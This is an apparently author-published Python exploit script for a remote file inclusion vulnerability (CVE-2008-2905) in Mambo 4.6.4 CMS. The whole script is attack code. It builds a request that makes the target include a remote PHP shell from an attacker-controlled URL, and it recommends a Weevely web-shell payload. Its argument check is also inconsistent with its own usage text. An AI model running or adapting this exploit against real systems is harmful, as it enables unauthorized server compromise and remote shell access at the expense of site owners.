#!/usr/bin/env python # Title: Mambo 4.6.4 mosConfig_absolute_path RFI # CVE: CVE-2008-2905 # Reference: http://heapoverflow.com/f0rums/advisories/6915-cve-2008-2905-mambo.html # Author: infodox # Site: http://insecurety.net/ # Twitter: @info_dox # Old news, just practicin' my python :3 import requests # You better easy_install requests :3 import sys vulnurl = "/includes/Cache/Lite/Output.php?" # Oh look, the vuln URL! param = "mosConfig_absolute_path=" # the vuln paramater. payloadurl = "http://example.com/shell.php" # Your evil PHP code goes here right? def banner(): print """ Mambo 4.6.4 mosConfig_absolute_path RFI Rather lame exploit I must admit, just practicing my Python. To use, just run it against the host and pray. I advise using a Weevely payload. ~infodox """ if len(sys.argv) != 4: banner() print "Usage: ./x2.py <target>" print "Where <target> is the vulnerable website." print "Example: ./x2.py http://lamesite.com" sys.exit(1) banner() target = sys.argv[1] pwnme = target + vulnurl + param + payloadurl print "[+] Running Exploit..." requests.get(pwnme) # See? Requests is AWESOME! print "[?] Gotshell?"